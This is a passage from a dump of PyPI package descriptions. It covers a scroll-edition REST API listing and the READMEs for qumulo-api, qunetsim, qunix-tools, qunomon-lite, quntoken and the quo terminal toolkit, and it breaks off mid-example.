Attributes with a null value will be ignored. For instance, setting the mask to null or "" will result in no changes to the current mask, and no value for the mask will be returned (or broadcast). Likewise, the transformation, name, or status message may be set to null and no change will be made to those entities (though any unchanged values will be returned along with the changed values and also broadcast to co-editors).ArtefactApiv1_editions_edition_id_artefacts_artefact_id_rois_getGET/v1/editions/{editionId}/artefacts/{artefactId}/roisProvides a listing of all rois belonging to an artefact in the specified editionArtefactApiv1_editions_edition_id_artefacts_artefact_id_text_fragments_getGET/v1/editions/{editionId}/artefacts/{artefactId}/text-fragmentsProvides a listing of text fragments that have text in the specified artefact. 
With the optional query parameter "suggested", this endpoint will also return any text fragment that the system suggests might have text in the artefact.ArtefactApiv1_editions_edition_id_artefacts_batch_transformation_postPOST/v1/editions/{editionId}/artefacts/batch-transformationUpdates the positional data for a batch of artefactsArtefactApiv1_editions_edition_id_artefacts_getGET/v1/editions/{editionId}/artefactsProvides a listing of all artefacts that are part of the specified editionArtefactApiv1_editions_edition_id_artefacts_postPOST/v1/editions/{editionId}/artefactsCreates a new artefact with the provided data. If no mask is provided, a placeholder mask will be created with the values: "POLYGON((0 0,1 1,1 0,0 0))" (the system requires a valid WKT polygon mask for every artefact). It is not recommended to leave the mask, name, or work status blank or null. It will often be advantageous to leave the transformation null when first creating a new artefact.CatalogueApiv1_catalogue_confirm_match_iaa_edition_catalog_to_text_fragment_id_deleteDELETE/v1/catalogue/confirm-match/{iaaEditionCatalogToTextFragmentId}Remove an existing imaged object and text fragment match, which is not correctCatalogueApiv1_catalogue_confirm_match_iaa_edition_catalog_to_text_fragment_id_postPOST/v1/catalogue/confirm-match/{iaaEditionCatalogToTextFragmentId}Confirm the correctness of an existing imaged object and text fragment matchCatalogueApiv1_catalogue_editions_edition_id_imaged_object_text_fragment_matches_getGET/v1/catalogue/editions/{editionId}/imaged-object-text-fragment-matchesGet a listing of all corresponding imaged objects and transcribed text fragment in a specified editionCatalogueApiv1_catalogue_imaged_objects_imaged_object_id_text_fragments_getGET/v1/catalogue/imaged-objects/{imagedObjectId}/text-fragmentsGet a listing of all text fragments matches that correspond to an imaged objectCatalogueApiv1_catalogue_manuscripts_manuscript_id_imaged_object_text_fragment_matches_getGET/v1/catalogue/manuscripts/{manuscriptId}/imaged-object-text-fragment-matchesGet a listing of all corresponding imaged objects and transcribed text fragment in a specified manuscriptCatalogueApiv1_catalogue_postPOST/v1/catalogueCreate a new matched pair for an imaged object and a text fragment along with the edition princeps informationCatalogueApiv1_catalogue_text_fragments_text_fragment_id_imaged_objects_getGET/v1/catalogue/text-fragments/{textFragmentId}/imaged-objectsGet a listing of all imaged objects that matches that correspond to a transcribed text fragmentEditionApiv1_editions_admin_share_requests_getGET/v1/editions/admin-share-requestsGet a list of requests issued by the current user for other users to become editors of a shared editionEditionApiv1_editions_confirm_editorship_token_postPOST/v1/editions/confirm-editorship/{token}Confirm addition of an editor to the specified editionEditionApiv1_editions_edition_id_add_editor_request_postPOST/v1/editions/{editionId}/add-editor-requestAdds an editor to the specified editionEditionApiv1_editions_edition_id_deleteDELETE/v1/editions/{editionId}Provides details about the specified edition and all accessible alternate editionsEditionApiv1_editions_edition_id_editors_editor_email_id_putPUT/v1/editions/{editionId}/editors/{editorEmailId}Changes the rights for an editor of the specified editionEditionApiv1_editions_edition_id_getGET/v1/editions/{editionId}Provides details about the specified edition and all accessible alternate 
editionsEditionApiv1_editions_edition_id_postPOST/v1/editions/{editionId}Creates a copy of the specified editionEditionApiv1_editions_edition_id_putPUT/v1/editions/{editionId}Updates data for the specified editionEditionApiv1_editions_edition_id_script_collection_getGET/v1/editions/{editionId}/script-collectionProvides spatial data for all letters in the editionEditionApiv1_editions_edition_id_script_lines_getGET/v1/editions/{editionId}/script-linesProvides spatial data for all letters in the edition organized and oriented by lines.EditionApiv1_editions_editor_invitations_getGET/v1/editions/editor-invitationsGet a list of invitations issued to the current user to become an editor of a shared editionEditionApiv1_editions_getGET/v1/editionsProvides a listing of all editions accessible to the current userImagedObjectApiv1_editions_edition_id_imaged_objects_getGET/v1/editions/{editionId}/imaged-objectsProvides a listing of imaged objects related to the specified edition, can include images and also their masks with optional.ImagedObjectApiv1_editions_edition_id_imaged_objects_imaged_object_id_getGET/v1/editions/{editionId}/imaged-objects/{imagedObjectId}Provides information for the specified imaged object related to the specified edition, can include images and also their masks with optional.ImagedObjectApiv1_imaged_objects_imaged_object_id_getGET/v1/imaged-objects/{imagedObjectId}Provides information for the specified imaged object.ImagedObjectApiv1_imaged_objects_imaged_object_id_text_fragments_getGET/v1/imaged-objects/{imagedObjectId}/text-fragmentsProvides a list of all text fragments that should correspond to the imaged object.ImagedObjectApiv1_imaged_objects_institutions_getGET/v1/imaged-objects/institutionsProvides a list of all institutional image providers.ImagedObjectApiv1_imaged_objects_institutions_institution_name_getGET/v1/imaged-objects/institutions/{institutionName}Provides a list of all institutional image providers.RoiApiv1_editions_edition_id_rois_batch_edit_postPOST/v1/editions/{editionId}/rois/batch-editProcesses a series of create/update/delete ROI requests in the given edition of a scrollRoiApiv1_editions_edition_id_rois_batch_postPOST/v1/editions/{editionId}/rois/batchCreates new sign ROI's in the given edition of a scrollRoiApiv1_editions_edition_id_rois_batch_putPUT/v1/editions/{editionId}/rois/batchUpdate existing sign ROI's in the given edition of a scrollRoiApiv1_editions_edition_id_rois_postPOST/v1/editions/{editionId}/roisCreates new sign ROI in the given edition of a scrollRoiApiv1_editions_edition_id_rois_roi_id_deleteDELETE/v1/editions/{editionId}/rois/{roiId}Deletes a sign ROI from the given edition of a scrollRoiApiv1_editions_edition_id_rois_roi_id_getGET/v1/editions/{editionId}/rois/{roiId}Get the details for a ROI in the given edition of a scrollRoiApiv1_editions_edition_id_rois_roi_id_putPUT/v1/editions/{editionId}/rois/{roiId}Update an existing sign ROI in the given edition of a scrollSignInterpretationApiv1_editions_edition_id_sign_interpretations_attributes_attribute_id_deleteDELETE/v1/editions/{editionId}/sign-interpretations-attributes/{attributeId}Delete an attribute from an editionSignInterpretationApiv1_editions_edition_id_sign_interpretations_attributes_attribute_id_putPUT/v1/editions/{editionId}/sign-interpretations-attributes/{attributeId}Change the details of an attribute in an editionSignInterpretationApiv1_editions_edition_id_sign_interpretations_attributes_getGET/v1/editions/{editionId}/sign-interpretations-attributesRetrieve a list of all 
possible attributes for an editionSignInterpretationApiv1_editions_edition_id_sign_interpretations_attributes_postPOST/v1/editions/{editionId}/sign-interpretations-attributesCreate a new attribute for an editionSignInterpretationApiv1_editions_edition_id_sign_interpretations_postPOST/v1/editions/{editionId}/sign-interpretationsCreates a new sign interpretationSignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_attributes_attribute_value_id_deleteDELETE/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}/attributes/{attributeValueId}This deletes the specified attribute value from the specified sign interpretation.SignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_attributes_attribute_value_id_putPUT/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}/attributes/{attributeValueId}This changes the values of the specified sign interpretation attribute, mainly used to change commentary.SignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_attributes_postPOST/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}/attributesThis adds a new attribute to the specified sign interpretation.SignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_commentary_putPUT/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}/commentaryUpdates the commentary of a sign interpretationSignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_deleteDELETE/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}Deletes the sign interpretation in the route. The endpoint automatically manages the sign stream by connecting all the deleted sign's next and previous nodes.SignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_getGET/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}Retrieve the details of a sign interpretation in an editionSignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_link_to_next_sign_interpretation_id_postPOST/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}/link-to/{nextSignInterpretationId}Links two sign interpretations in the edition's sign streamSignInterpretationApiv1_editions_edition_id_sign_interpretations_sign_interpretation_id_unlink_from_next_sign_interpretation_id_postPOST/v1/editions/{editionId}/sign-interpretations/{signInterpretationId}/unlink-from/{nextSignInterpretationId}Links two sign interpretations in the edition's sign streamTextApiv1_editions_edition_id_lines_line_id_getGET/v1/editions/{editionId}/lines/{lineId}Retrieves all signs and their data from the given lineTextApiv1_editions_edition_id_text_fragments_getGET/v1/editions/{editionId}/text-fragmentsRetrieves the ids of all Fragments of all fragments in the given edition of a scrollTextApiv1_editions_edition_id_text_fragments_postPOST/v1/editions/{editionId}/text-fragmentsCreates a new text fragment in the given edition of a scrollTextApiv1_editions_edition_id_text_fragments_text_fragment_id_artefacts_getGET/v1/editions/{editionId}/text-fragments/{textFragmentId}/artefactsRetrieves the ids of all Artefacts in the given textFragmentNameTextApiv1_editions_edition_id_text_fragments_text_fragment_id_getGET/v1/editions/{editionId}/text-fragments/{textFragmentId}Retrieves all signs and their data from the given 
textFragmentNameTextApiv1_editions_edition_id_text_fragments_text_fragment_id_lines_getGET/v1/editions/{editionId}/text-fragments/{textFragmentId}/linesRetrieves the ids of all lines in the given textFragmentNameTextApiv1_editions_edition_id_text_fragments_text_fragment_id_putPUT/v1/editions/{editionId}/text-fragments/{textFragmentId}Updates the specified text fragment with the submitted propertiesUserApiv1_users_change_forgotten_password_postPOST/v1/users/change-forgotten-passwordUses the secret token from /users/forgot-password to validate a reset of the user's passwordUserApiv1_users_change_password_postPOST/v1/users/change-passwordChanges the password for the currently logged in userUserApiv1_users_change_unactivated_email_postPOST/v1/users/change-unactivated-emailAllows a user who has not yet activated their account to change their email address. This will not work if the user account associated with the email address has already been activatedUserApiv1_users_confirm_registration_postPOST/v1/users/confirm-registrationConfirms registration of new user account.UserApiv1_users_forgot_password_postPOST/v1/users/forgot-passwordSends a secret token to the user's email to allow password reset.UserApiv1_users_getGET/v1/usersProvides the user details for a user with valid JWT in the Authorize headerUserApiv1_users_login_postPOST/v1/users/loginProvides a JWT bearer token for valid email and passwordUserApiv1_users_postPOST/v1/usersCreates a new user with the submitted data.UserApiv1_users_putPUT/v1/usersUpdates a user's registration details. Note that the if the email address has changed, the account will be set to inactive until the account is activated with the secret token.UserApiv1_users_resend_activation_email_postPOST/v1/users/resend-activation-emailSends a new activation email for the user's account. This will not work if the user account associated with the email address has already been activated.UtilApiv1_utils_repair_wkt_polygon_postPOST/v1/utils/repair-wkt-polygonChecks a WKT polygon to ensure validity. 
If the polygon is invalid, it attempts to construct a valid polygon that matches the original as closely as possible.Documentation For ModelsAccountActivationRequestDTOAdminEditorRequestDTOAdminEditorRequestListDTOArtefactDTOArtefactDataDTOArtefactDataListDTOArtefactGroupDTOArtefactGroupListDTOArtefactListDTOArtefactTextFragmentMatchDTOArtefactTextFragmentMatchListDTOAttributeDTOAttributeListDTOAttributeValueDTOBatchEditRoiDTOBatchEditRoiResponseDTOBatchUpdateArtefactPlacementDTOBatchUpdatedArtefactTransformDTOCatalogueMatchDTOCatalogueMatchInputDTOCatalogueMatchListDTOCharacterShapeDTOCommentaryCreateDTOCommentaryDTOCreateArtefactDTOCreateArtefactGroupDTOCreateAttributeDTOCreateAttributeValueDTOCreateTextFragmentDTODeleteDTODeleteTokenDTODetailedEditorRightsDTODetailedUserDTODetailedUserTokenDTODirectionEditionCopyDTOEditionDTOEditionEntitiesEditionGroupDTOEditionListDTOEditionManuscriptMetricsDTOEditionScriptCollectionDTOEditionScriptLinesDTOEditionUpdateRequestDTOEditorDTOEditorInvitationDTOEditorInvitationListDTOImageDTOImageInstitutionDTOImageInstitutionListDTOImageStackDTOImagedObjectDTOImagedObjectListDTOImagedObjectTextFragmentMatchDTOImagedObjectTextFragmentMatchListDTOInstitutionalImageDTOInstitutionalImageListDTOInterpretationAttributeCreateDTOInterpretationAttributeDTOInterpretationRoiDTOInterpretationRoiDTOListInviteEditorDTOLightingLineDTOLineDataDTOLineDataListDTOLineTextDTOLoginRequestDTONewUserRequestDTONextSignInterpretationDTOPermissionDTOPlacementDTOResendUserAccountActivationRequestDTOResetForgottenUserPasswordRequestDTOResetLoggedInUserPasswordRequestDTOResetUserPasswordRequestDTOScriptArtefactCharactersDTOScriptLineDTOScriptTextFragmentDTOSetInterpretationRoiDTOSetInterpretationRoiDTOListSideDesignationSignDTOSignInterpretationCreateDTOSignInterpretationDTOSignInterpretationListDTOSimpleImageDTOSimpleImageListDTOTextEditionDTOTextFragmentDTOTextFragmentDataDTOTextFragmentDataListDTOTranslateDTOUnactivatedEmailUpdateRequestDTOUpdateArtefactDTOUpdateArtefactGroupDTOUpdateArtefactPlacementDTOUpdateAttributeDTOUpdateAttributeValueDTOUpdateEditionManuscriptMetricsDTOUpdateEditorRightsDTOUpdateInterpretationRoiDTOUpdateInterpretationRoiDTOListUpdateTextFragmentDTOUpdatedArtefactPlacementDTOUpdatedInterpretationRoiDTOUpdatedInterpretationRoiDTOListUserDTOUserUpdateRequestDTOWktPolygonDTODocumentation For AuthorizationBearerType: API keyAPI key parameter name: AuthorizationLocation: HTTP headerAuthor"} +{"package": "qumulo-api", "pacakge-description": "This package contains the Qumulo Core Python SDK and the qq CLI utility, which\nallow users to interact with the Qumulo REST API server.Using the Python SDKTo get started, import theRestClientclass from thequmulo.rest_clientmodule and create an instance. 
TheRestClientclass contains attributes\nthat allow programmatic access to all of the Qumulo Core REST API endpoints.For example:from qumulo.rest_client import RestClient\n\n# Create an instance of RestClient associated with the Qumulo Core file\nsystem at qumulo.mycompany.net\nrc = RestClient(\"qumulo.mycompany.net\", 8000)\n\n# Log in to Qumulo Core using local user or Active Directory credentials\nrc.login(\"username\", \"password\")\n\n# Print all of the SMB share configuration information\nprint(rc.smb.smb_list_shares())To inspect the various available properties, open a Python REPL and run the\nfollowing commands:from qumulo.rest_client import RestClient\n\nrc = RestClient(\"qumulo.mycompany.net\", 8000)\n\n# See REST API groups:\n[p for p in dir(rc) if not p.startswith('_')]\n\n# See SDK endpoints within a particular API group\n[p for p in dir(rc.quota) if not p.startswith('_')]Using qqAfter installing the qumulo-api package, theqqCLI utility will be installed\nin your system.Note: On Windows,qq.execan be found under theScripts\\directory in your\nPython installation. Adding this path your your%%PATH%%environment variable\nwill allow you to runqq.exewithout prefixing it with the full path.To see all commands available from theqqtool:$ qq --helpTo run most commands against the REST API server, you must first login:$ qq --host host_ip login --user adminOnce authenticated, you can run other commands:# Get the network configuation of nodes in the cluster:\n$ qq --host network_poll\n\n# Get the list of users\n$ qq --host auth_list_users\n\n# Get help with a specific command\n$ qq --host auth_list_users --helpTo see the information about the actual HTTP requests and responses sent over\nthe wire for a particular command, use the\u2013debugflag:$ qq --host --debug smb_settings_get\n REQUEST: GET https://:8000/v1/smb/settings\n REQUEST HEADERS:\n User-Agent: qq\n Content-Type: application/json\n Content-Length: 0\n Authorization: Bearer \n RESPONSE STATUS: 200\n RESPONSE:\n Date: Fri, 18 Mar 2022 22:15:47 GMT\n ETag: \"VNhqnQ\"\n Content-Type: application/json\n Content-Length: 329\n Strict-Transport-Security: max-age=31536000; includeSubdomain\n\n\n {'session_encryption': 'NONE', 'supported_dialects': ['SMB2_DIALECT_2_002', 'SMB2_DIALECT_2_1', 'SMB2_DIALECT_3_0', 'SMB2_DIALECT_3_11'], 'hide_shares_from_unauthorized_users': False, 'hide_shares_from_unauthorized_hosts': False, 'snapshot_directory_mode': 'VISIBLE', 'bypass_traverse_checking': False, 'signing_required': False}NotesFor more information, visit our Knowledge Base site:https://care.qumulo.com"} +{"package": "qunetsim", "pacakge-description": "QuNetSimQuNetSim is a quantum-enabled network simulator that adds common quantum networking tasks like teleportation, superdense coding, sharing EPR pairs, etc. With QuNetSim, one can design and test robust quantum network protocols under various network conditions.Installation and DocumentationSeehttps://tqsd.github.io/QuNetSim/for documentation. To install the latest release via pip:pip install qunetsimQuick Start GuideTemplaterThe QuNetSim pip package comes with a templater. After installing the library, simply typetemplateand follow the instructions. 
A template QuNetSim example will be generated.Quick Examplefrom qunetsim.components import Host, Network\n\nnetwork = Network.get_instance()\nnetwork.start()\n\nalice = Host('Alice')\nbob = Host('Bob')\n\nalice.add_connection(bob.host_id)\nbob.add_connection(alice.host_id)\n\nalice.start()\nbob.start()\n\nnetwork.add_hosts([alice, bob])\n\n# Block Alice to wait for qubit arrive from Bob\nalice.send_epr(bob.host_id, await_ack=True)\nq_alice = alice.get_epr(bob.host_id)\nq_bob = bob.get_epr(alice.host_id)\n\nprint(\"EPR is in state: %d, %d\" % (q_alice.measure(), q_bob.measure()))\nnetwork.stop(True)ContributingFeel free to contribute by adding Github issues and pull requests. Adding test cases for any contributions is a requirement for any pull request to be merged.Citation@article{diadamo2020qunetsim,\n title={QuNetSim: A Software Framework for Quantum Networks},\n author={DiAdamo, Stephen and N{\\\"o}tzel, Janis and Zanger, Benjamin and Be{\\c{s}}e, Mehmet Mert},\n journal={IEEE Transactions on Quantum Engineering},\n year={2021},\n doi={10.1109/TQE.2021.3092395}\n}"} +{"package": "qunix-tools", "pacakge-description": "QuNiXQuNiX is a project of Unix like python programs by using Qiskit and Quantum Circuit with followingUnix PhilosophyPrograms useMicroQiskitandQiskitProgram ListQuantum Circuit Builder(QCB)QCB_DrawAleaQArtQSayUsageIn Terminal$pip install qunix-tools\n\n$qcb -q 3 -c 3 \"h 0 h 1 h 2 m .\"\n\n$qcb_draw -q 2 -c 2 \"h 0 h 1 m .\"\n\n$alea -f happySlack ImplementationQiriBy running our programs as backend of Slack Bot, Qiri will get the input from the chat to it, and give us the output of programs.\nThis means we can run theQCBandAleaanytime we want in Slack.Share the result of qauntum computation and qauntum quotes randomly selected by measuring superposition of qubitsThis project is for IBM'sQiskit-Hackerthon-Korea-2021CreditQiskit(https://github.com/Qiskit/qiskit)MicroQiskit(https://github.com/qiskit-community/MicroQiskit)LicencseApache License 2.0"} +{"package": "qunomon-lite", "pacakge-description": "qunomon-lite: Lightweight tool for using Qunomon, AITQunomon\u304a\u3088\u3073AIT(AI system Test package)\u306e\u7c21\u6613\u5229\u7528\u30c4\u30fc\u30eb\ud83d\udccc DescriptionQunomon\u304c\u63d0\u4f9b\u3059\u308b\u4e00\u90e8\u306e\u6a5f\u80fd\u3092\u7c21\u6613\u7684\u306b\u5229\u7528\u3067\u304d\u308b\u3001\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u30fbPython\u30c4\u30fc\u30eb\u3067\u3059\u3002\nQunomon\u3092\u8d77\u52d5\u3059\u308b\u3053\u3068\u306a\u304fAIT(AI system Test package)\u3092\u5b9f\u884c\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\n\u4e0b\u8a18\u306b\u6319\u3052\u308b\u3088\u3046\u306a\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u306b\u304a\u3044\u3066\u3001ML\u958b\u767a\u8005\u304cPoC\u3084\u958b\u767a\u6642\u306b\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u3084Python\u30d7\u30ed\u30b0\u30e9\u30e0\u30fbJupyter\u30ce\u30fc\u30c8\u30d6\u30c3\u30af\u304b\u3089\u5229\u7528\u3057\u305f\u308a\u3001ML\u958b\u767a\u30d1\u30a4\u30d7\u30e9\u30a4\u30f3\u4e0a\u3067\u5229\u7528\u3055\u308c\u308b\u3053\u3068\u3092\u60f3\u5b9a\u3057\u3066\u3044\u307e\u3059\u3002ML\u958b\u767a\u8005\u304c\u3001\u81ea\u8eab\u306e\u958b\u767a\u74b0\u5883\u3067\u3001Qunomon\u306eAI\u30b7\u30b9\u30c6\u30e0\u8a55\u4fa1\u30d1\u30c3\u30b1\u30fc\u30b8\uff08AIT: AI system Test 
package\uff09\u3092\u304a\u8a66\u3057\u3067\u4f7f\u3063\u3066\u307f\u305f\u3044ML\u958b\u767a\u8005\u304c\u3001Qunomon\u306e\u54c1\u8cea\u30ec\u30dd\u30fc\u30c8\u3092\u57fa\u306b\u3001ML\u30e2\u30c7\u30eb\u306e\u6539\u5584\u5bfe\u5fdc\u3092\u884c\u3063\u3066\u3044\u3066\u3001AIT\u3092\u30ef\u30f3\u30bf\u30a4\u30e0\u3067\u5b9f\u884c\u3057\u3066\u6539\u5584\u5177\u5408\u3092\u898b\u305f\u3044ML\u958b\u767a\u30d1\u30a4\u30d7\u30e9\u30a4\u30f3\u306b\u3066\u3001AIT\u3092\u5b9f\u884c\u3057\u3001\u54c1\u8cea\u6307\u6a19\u3068\u3057\u3066\u6d3b\u7528\u3057\u305f\u3044Note: \u5f53\u30c4\u30fc\u30eb\u306fQunomon\u3092\u7f6e\u304d\u63db\u3048\u308b\u3082\u306e\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3002\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u306b\u3088\u3063\u3066\u3001Qunomon\u306e\u5229\u7528\u3092\u691c\u8a0e\u304f\u3060\u3055\u3044\u3002\u2705 Features\u300cAIT\u306e\u5b9f\u884c\u300d\u3084\u300cAIT\u306e\u5b9f\u884c\u7d50\u679c\u8868\u793a\u300d\u306b\u95a2\u3057\u3066\u3001\u3088\u308a\u67d4\u8edf\u306a\u4f7f\u3044\u65b9\u3092\u5b9f\u73fe\u3059\u308b\u6a5f\u80fd\u3092\u63d0\u4f9b\u3057\u307e\u3059\u3002\u6a5f\u80fda. AIT\u306e\u5b9f\u884c\u2705 \u30ed\u30fc\u30ab\u30eb\u74b0\u5883\uff08Docker\uff09\u3067AIT\u5b9f\u884c\u2705 \u30d1\u30d6\u30ea\u30c3\u30afAIT\u306e\u5229\u7528\u2b1b \u30d7\u30e9\u30a4\u30d9\u30fc\u30c8AIT\u306e\u5229\u7528\u6a5f\u80fdb. AIT\u306e\u5b9f\u884c\u7d50\u679c\u8868\u793a\u2705 AIT\u30ed\u30fc\u30ab\u30eb\u5b9f\u884c\u7d50\u679c\u306e\u95b2\u89a7\u2b1b AIT\u30ed\u30fc\u30ab\u30eb\u5b9f\u884c\u7d50\u679c\u306e\u6e2c\u5b9a\u5024\uff08Measures\uff09\u306e\u53d6\u5f97\u2b1b AIT\u30ed\u30fc\u30ab\u30eb\u5b9f\u884c\u7d50\u679c\u306e\u4e00\u89a7\ud83d\udcbe InstallRequirementsdockersudo\u7121\u3057\u3067docker\u30b3\u30de\u30f3\u30c9\u304c\u5b9f\u884c\u3067\u304d\u308b\u3053\u3068python 3.x, pipStepInstallpipinstallqunomon-lite\u958b\u767a\u4e2d\u306e\u6700\u65b0\u306fGitHub\u30ea\u30dd\u30b8\u30c8\u30ea\u304b\u3089\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3067\u304d\u307e\u3059pipinstall-Ugit+https://github.com/ads-ad-itcenter/qunomon-lite.git\ud83d\ude80 Usage\u4f7f\u7528\u4f8b:CUI:examples/example-cli.mdPython:examples/example-notebook.ipynbAIT\u306e\u5b9f\u884c\uff08\u30d1\u30d6\u30ea\u30c3\u30afAIT\uff09\u5b9f\u884c\u3057\u305f\u3044AIT\u3092\u63a2\u3057\u3001AIT\u6bce\u306b\u63d0\u4f9b\u3055\u308c\u3066\u3044\u308bait.manifest.json\u3092\u53c2\u7167\u3057\u3066\u3001\u5b9f\u884c\u306b\u5fc5\u8981\u3068\u306a\u308b\u30d5\u30a1\u30a4\u30eb\u3084\u30d1\u30e9\u30e1\u30fc\u30bf\u3092\u7528\u610f\u3057\u3066\u304a\u304f\u63a2\u3059\u5834\u6240: Qunomon\u306eGitHub\u30ea\u30dd\u30b8\u30c8\u30ea\u304b\u3089\n\u4f8b:https://github.com/aistairc/qunomon/blob/main/ait_repository/ait/eval_mnist_acc_tf2.3_0.1/deploy/container/repository/ait.manifest.jsonAIT\u3092\u5b9f\u884c\u3057\u3001\u7d50\u679c\u3092\u8868\u793aCUI:qunomon-liteaitrun:[--inventories=...][--params=...]qunomon-liteaitresult-showPython:fromqunomon_liteimportaitresult=ait.run(':',inventories={'':'',...},params={'':'',...},)result.show()AIT\u306e\u5b9f\u884c\u7d50\u679c\u8868\u793aAIT\u5b9f\u884c\u7d50\u679c\u306e\u95b2\u89a7CUI:qunomon-liteaitresult-show{latest|}Python:result=ait.result(\u672a\u6307\u5b9aor'latest'or'')# \u672a\u6307\u5b9a or 'latest': \u6700\u65b0\u306e\u5b9f\u884c\u7d50\u679cresult.show()\u2139\ufe0f Anything elseTroubleshootingqunomon-lite\u30b3\u30de\u30f3\u30c9\u304c\u898b\u3064\u304b\u3089\u306a\u3044\uff08command not 
found\uff09$qunomon-lite--help\nqunomon-lite:commandnotfoundDebian\u30d1\u30c3\u30b1\u30fc\u30b8\u306epip\u30b3\u30de\u30f3\u30c9\uff08python3-pip\uff09\u306f\u3001\u4e00\u822c\u30e6\u30fc\u30b6\u3067pip install\u3059\u308b\u3068\u3001\u30c7\u30d5\u30a9\u30eb\u30c8\u3067~/.local\u306b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u308b\u3088\u3046\u3067\u3059\uff08--user\u30aa\u30d7\u30b7\u30e7\u30f3\u304c\u81ea\u52d5\u3067\u4ed8\u4e0e\uff09\u3002\n\u305d\u306e\u305f\u3081\u3001Debian\u7cfb\u306eOS\uff08Debian, Ubuntu,,,\uff09\u3067\u3001\u5404OS\u30d1\u30c3\u30b1\u30fc\u30b8\u306epip\u3092\u5229\u7528\u3057\u3066\u3044\u308b\u5834\u5408\uff08\u4f8b.sudo apt install python3-pip\uff09\u306f\u3001~/.local/bin\u306bPATH\u3092\u901a\u3057\u3066\u307f\u3066\u304f\u3060\u3055\u3044\u3002# for example...$exportPATH=\"$HOME/.local/bin:$PATH\"AIT\u5b9f\u884c\u3067PermissionError\u304c\u767a\u751f\uff08Permission denied\uff09$qunomon-literunqunomon/eval_mnist_acc_tf2.3:0.1...\n\n...\nRunningdockercontainer(image:qunomon/eval_mnist_acc_tf2.3:0.1)...\nErrorwhilefetchingserverAPIversion:('Connection aborted.',PermissionError(13,'Permission denied'))\u5f53\u30c4\u30fc\u30eb\u30fb\u30d1\u30c3\u30b1\u30fc\u30b8\u3092\u5229\u7528\u3059\u308b\u306b\u306f\u3001\u5b9f\u884c\u30e6\u30fc\u30b6\u30fc\u304c\u3001sudo\u305b\u305a\u306bdocker\u30b3\u30de\u30f3\u30c9\u304c\u5229\u7528\u3067\u304d\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002# for example...$sudousermod-aGdocker$USER\ud83d\udccb LICENCEApache License 2.0"} +{"package": "qunqunpdf", "pacakge-description": "This is the home page of our project."} +{"package": "quntest", "pacakge-description": "come back to this in a second"} +{"package": "quntoken", "pacakge-description": "quntokenNew Hungarian tokenizer based on quex and huntoken.\nThis tool is alsointegratedinto thee-magyarlanguage processing system\nunder the nameemToken.RequirementsOS: linux x86-64python 3.6+Developer requirements:python 2.7 (for quex)g++ = 5Installpip3installquntokenUsageCommand linequntokenreads plain text in UTF-8 from STDIN and writes to STDOUT.The default (and recommended) format of output is TSV. It has two columns.\nThe first contains the token, the second contains the white space sequence\nafter the token. Sentence boundaries are marked with empty lines.Example: tokenizinginput.txtfile, writing the TSV output intooutput.tsvfile.quntoken output.tsvOptional arguments:-h, --help show this help message and exit\n -f FORM, --form FORM Valid formats: json, tsv, xml and spl (sentence per\n line). Default format: tsv.\n -m MODE, --mode MODE Modes: sentence or token. Default: token\n -w, --word-break Eliminate word break from end of lines.\n -v, --version show program's version number and exitPython APIquntoken.tokenize(inp=sys.stdin, form='tsv', mode='token',\nword_break=False)Entry point, returns an iterator object. Parameters:inp: Input iterator, default:sys.stdin.form: Format of output. Valid formats:'tsv'(default),'json','xml'and'spl'(sentence per line).mode:'sentence'(only sentence segmenting) or'token'(full\ntokenization - default).word_break: If'True', eliminates word break from end of lines. 
Default:'False'.Example:fromquntokenimporttokenizefortokintokenize(open('input.txt')):print(tok,end='')"} +{"package": "quo", "pacakge-description": "Forever ScalableQuois a toolkit for writing Command-Line Interface(CLI) applications and a TUI (Text User Interface) framework for Python.Quo is making headway towards composing speedy and orderly CLI and TUI applications while forestalling any disappointments brought about by the failure to execute a python application.\nSimple to code, easy to learn, and does not come with needless baggage.CompatibilityQuo works flawlessly with Linux, OSX, and Windows.\nQuo requires Python3.8or later.FeaturesSupport for Ansi, RGB and Hex color modelsSupport for tabular presentation of dataIntuitive progressbarsCode completionsNesting of commandsCustomizable Text User Interface(TUI)dialogs.Automatic help page generationSyntax highlightingAutosuggestionsKey BindersGetting StartedInstallationYou can install quo via the Python Package Index (PyPI)pip install -U quoIn order to check your installation you can usepython -m pip show quoRun the following to test Quo output on your terminal:python -m quo:bulb: pressCtrl-cto exitQuo LibraryQuo contains a number of builtin features you c\nan use to create elegant output in your CLI.Quo echoTo output formatted text to your terminal you can import theechomethod.\nTry this:Example 1fromquoimportechoecho(\"Hello, World!\",fg=\"red\",italic=True,bold=True)Example 2fromquoimportechoecho(\"Blue on white\",fg=\"blue\",bg=\"white\")Alternatively, you can importprintExample 1fromquoimportprintprint('This is bold')print('This is italic')Example 2fromquoimportprintprint('This is underlined')Example 3fromquoimportprintprint(\"Quo is \")Example 4# Colors from the ANSI palette.print('This is red')print('\")Example 5Here's an example of a multiline bottom toolbar.fromquo.promptimportPromptsession=Prompt()session.prompt(\"Say something: \",bottom_toolbar=\"This is\\na multiline toolbar\")Example 6Placeholder textA placeholder text that's displayed as long as no input s given.:bulb: This won't be returned as part of the output.fromquo.promptimportPromptsession=Prompt()session.prompt(\"What is your name?: \",placeholder='(please type something)')Example 7Coloring the prompt.fromquo.promptimportPromptsession=Prompt(fg=\"red\")session.prompt(\"Type something: 